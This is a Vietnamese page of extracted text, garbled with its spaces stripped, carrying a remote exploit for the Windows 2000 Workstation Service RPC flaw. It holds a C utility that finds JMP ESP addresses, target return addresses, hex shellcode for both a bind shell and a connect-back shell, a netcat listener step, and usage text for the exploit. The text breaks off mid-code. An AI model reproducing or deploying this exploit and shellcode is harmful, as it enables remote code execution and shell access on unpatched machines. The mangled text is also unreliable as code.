Microsoft Workstation Service Remote Exploit

Lỗi RPC . Ở mã khai thác này chỉ cung cấp địa chỉ JMP ESP cho bản Win2000 SP1, và SP4, các bạn có thể dùng jmp_esp sau để tìm địa chỉ JMP ESP cho các bản Win2000 với các SP tương ứngMã tìm JMP ESP
Nội dung trích xuất từ tài liệu:
Microsoft Workstation Service Remote ExploitMicrosoftWorkstationServiceRemoteExploittrangnàyđãđượcđọc lầnLỗiRPC.ỞmãkhaithácnàychỉcungcấpđịachỉJMPESPchobảnWin2000SP1,vàSP4,cácbạncóthểdùngjmp_espsauđểtìmđịachỉJMPESPchocácbảnWin2000vớicácSPtươngứngMãtìmJMPESP#include#include#includeintmain(intargc,char*argv[]){printf(SeamounJMPESP(http://www.nhomvicki.net)\n);if(argc!=2){printf(%s,argv[0]);exit(1);}BYTE*p;p=(BYTE*)LoadLibrary(argv[1]);if(p==NULL){printf(Loitrongkhinapthuvien%s,argv[1]);exit(1);}for(inti=0;;i++){try{if(p[i]==0xFF&&p[i+1]==0xE4){printf(Opcode\JMPESP\duoctimthaytaidiachi0x%X\n,(int)p+i);}}catch(...){break;}}return0;}KếtquảtìmkiếmJMPESPtrênWin2000ProSP3C:\>jmp_espuser32.dllSeamounJMPESP(http://www.nhomvicki.net)OpcodeJMPESPduoctimthaytaidiachi0x77E2AFC5OpcodeJMPESPduoctimthaytaidiachi0x77E2AFC9OpcodeJMPESPduoctimthaytaidiachi0x77E2AFE5OpcodeJMPESPduoctimthaytaidiachi0x77E388A7Đặtnetcatởchếđộlắngnghetrêncổng1234.HANDLEt1,t2;charbuff[BSIZE];struct{char*os;longjmpesp;char*dll;}targets[]={{Window2000(en)SP4,0x77e14c29,user32.dll5.0.2195.6688},{Window2000(en)SP1,0x77e3cb4c,user32.dll5.0.2195.1600},{Fordebuggingonly,0x41424344,dummy.dll5.0.2195.1600}},v;/**HDMooresshellcode.....;)*/charbindport[]=\xeb\x19\x5e\x31\xc9\x81\xe9\xa6\xff\xff\xff\x81\x36\x99\x99\x99\x99\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff\x71\xa1\x99\x99\x99\xda\xd4\xdd\x99\x7e\xe0\x5f\xe0\x7c\xd0\x1f\xd0\x3d\x34\xb7\x70\x3d\x83\xe9\x5e\x40\x90\x6c\x34\x52\x74\x65\xa2\x17\xd7\x97\x75\xe7\x41\x7b\xea\x34\x40\x9c\x57\xeb\x67\x2a\x8f\xce\xca\xab\xc6\xaa\xab\xb7\xdd\xd5\xd5\x99\x98\xc2\xcd\x10\x7c\x10\xc4\x99\xf3\xa9\xc0\xfd\x12\x98\x12\xd9\x95\x12\xe9\x85\x34\x12\xc1\x91\x72\x95\x14\xce\xb5\xc8\xcb\x66\x49\x10\x5a\xc0\x72\x89\xf3\x91\xc7\x98\x77\xf3\x93\xc0\x12\xe4\x99\x19\x60\x9f\xed\x7d\xc8\xca\x66\xad\x16\x71\x09\x99\x99\x99\xc0\x10\x9d\x17\x7b\x72\xa8\x66\xff\x18\x75\x09\x98\xcd\xf1\x98\x98\x99\x99\x66\xcc\xb9\xce\xce\xce\xce\xde\xce\xde\xce\x66\xcc\x85\x10\x5a\xa8\x66\xce\xce\xf1\x9b\x99\xf8\xb5\x10\x7f\xf3\x89\xcf\xca\x66\xcc\x81\xce\xca\x66\xcc\x8d\xce\xcf\xca\x66\xcc\x89\x10\x5b\xff\x18\x75\xcd\x99\x14\xa5\xbd\xa8\x59\xf3\x8c\xc0\x6a\x32\x10\x4e\x5f\xdd\xbd\x89\xdd\x67\xdd\xbd\xa4\x10\xe5\xbd\xd1\x10\xe5\xbd\xd5\x10\xe5\xbd\xc9\x14\xdd\xbd\x89\xcd\xc9\xc8\xc8\xc8\xd8\xc8\xd0\xc8\xc8\x66\xec\x99\xc8\x66\xcc\xa9\x10\x78\xf1\x66\x66\x66\x66\x66\xa8\x66\xcc\xb5\xce\x66\xcc\x95\x66\xcc\xb1\xca\xcc\xcf\xce\x12\xf5\xbd\x81\x12\xdc\xa5\x12\xcd\x9c\xe1\x98\x73\x12\xd3\x81\x12\xc3\xb9\x98\x72\x7a\xab\xd0\x12\xad\x12\x98\x77\xa8\x66\x65\xa8\x59\x35\xa1\x79\xed\x9e\x58\x56\x94\x98\x5e\x72\x6b\xa2\xe5\xbd\x8d\xec\x78\x12\xc3\xbd\x98\x72\xff\x12\x95\xd2\x12\xc3\x85\x98\x72\x12\x9d\x12\x98\x71\x72\x9b\xa8\x59\x10\x73\xc6\xc7\xc4\xc2\x5b\x91\x99;charconnback[]=\xeb\x19\x5e\x31\xc9\x81\xe9\xab\xff\xff\xff\x81\x36\x99\x99\x99\x99\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff\x71\xa9\x99\x99\x99\xda\xd4\xdd\x99\x7e\xe0\x5f\xe0\x75\x60\x33\xf9\x40\x90\x6c\x34\x52\x74\x65\xa2\x17\xd7\x97\x75\xe7\x41\x7b\xea\x34\x40\x9c\x57\xeb\x67\x2a\x8f\xce\xca\xab\xc6\xaa\xab\xb7\xdd\xd5\xd5\x99\x98\xc2\xcd\x10\x7c\x10\xc4\x99\xf3\xa9\xc0\xfd\x12\x98\x12\xd9\x95\x12\xe9\x85\x34\x12\xc1\x91\x72\x95\x14\xce\xbd\xc8\xcb\x66\x49\x10\x5a\xc0\x72\x89\xf3\x91\xc7\x98\x77\xf3\x91\xc0\x12\xe4\x99\x19\x60\x9d\xed\x7d\xc8\xca\x66\xad\x16\x71\x1a\x99\x99\x99\xc0\x10\x9d\x17\x7b\x72\xa8\x66\xff\x18\x75\x09\x98\xcd\xf1\x98\x98\x99\x99\x66\xcc\x81\xce\xce\xce\xce\xde\xce\xde\xce\x66\xcc\x8d\x10\x5a\xa8\x66\xf1\x59\x31\x91\xa0\xf1\x9b\x99\xf8\xb5\x10\x78\xf3\x89\xc8\xca\x66\xcc\x89\x1c\x59\xec\xdd\x14\xa5\xbd\xa8\x59\xf3\x8c\xc0\x6a\x32\x5f\xdd\xbd\x89\xdd\x67\xdd\xbd\xa4\x10\xc5\xbd\xd1\x10\xc5\xbd\xd5\x10\xc5\xbd\xc9\x14\xdd\xbd\x89\xcd\xc9\xc8\xc8\xc8\xd8\xc8\xd0\xc8\xc8\x66\xec\x99\xc8\x66\xcc\xb1\x10\x78\xf1\x66\x66\x66\x66\x66\xa8\x66\xcc\xbd\xce\x66\xcc\x95\x66\xcc\xb9\xca\xcc\xcf\xce\x12\xf5\xbd\x81\x12\xdc\xa5\x12\xcd\x9c\xe1\x98\x73\x12\xd3\x81\x12\xc3\xb9\x98\x72\x7a\xab\xd0\x12\xad\x12\x98\x77\xa8\x66\x65\xa8\x59\x35\xa1\x79\xed\x9e\x58\x56\x94\x98\x5e\x72\x6b\xa2\xe5\xbd\x8d\xec\x78\x12\xc3\xbd\x98\x72\xff\x12\x95\xd2\x12\xc3\x85\x98\x72\x12\x9d\x12\x98\x71\x72\x9b\xa8\x59\x10\x73\xc6\xc7\xc4\xc2\x5b\x91\x99\x09;voiderr_exit(char*s){printf(%s\n,s);exit(0);}/**RippedfromTESOcodeandmodifedbyey4sforwin32*and...lamerquoteditwholesalehere.....=p*/voiddoshell(intsock){intl;charbuf[512];structtimevaltime;unsignedlongul[2];time.tv_sec=1;time.tv_usec=0;while(1){ul[0]=1;ul[1]=sock;l=select(0,(fd_set*)&ul,NULL,NULL,&time);if(l==1){l=recv(sock,buf,sizeof(buf),0);if(l>8)&0xff);*ptr++=(char)(port&0xff);}voidbanner(){printf(\nWKSSVCRemoteExploitBySnooq[jinyean@hotmail.com]\n\n);}voidusage(char*s){banner();printf(Usage:%s[options]\n,s);printf(\tr\tSizeofreturnaddresses\n);printf(\ta\tAlignmentsize[0~3]\n);printf(\tp\tPorttobindshellto(inconnectingmode),or\n);printf(\t\tPortforshelltoconnectback(inlisteningmode)\n);printf(\ts\tShellcodeoffsetfromthereturnaddress\n);printf(\th\tTargetsIP\n);printf(\tt\tTargettypes.(Hformoreinfo)\n);printf(\tH\tShowlistofpossibletargets\n);printf(\tl\tListeningforshellconnecting\n);printf(\t\tbacktoportspecifiedbypswitch\n);printf(\ti\tIPforshelltoconnectback\n);printf(\tI\tTimeintervalbetweeneachtrial(connectingmodeonly)\n);printf(\tT\tTimeout(innumberofseconds)\n\n);printf(\tNotes:\n\t======\n\thismandatory\n);printf(\tiismandatoryifliss ...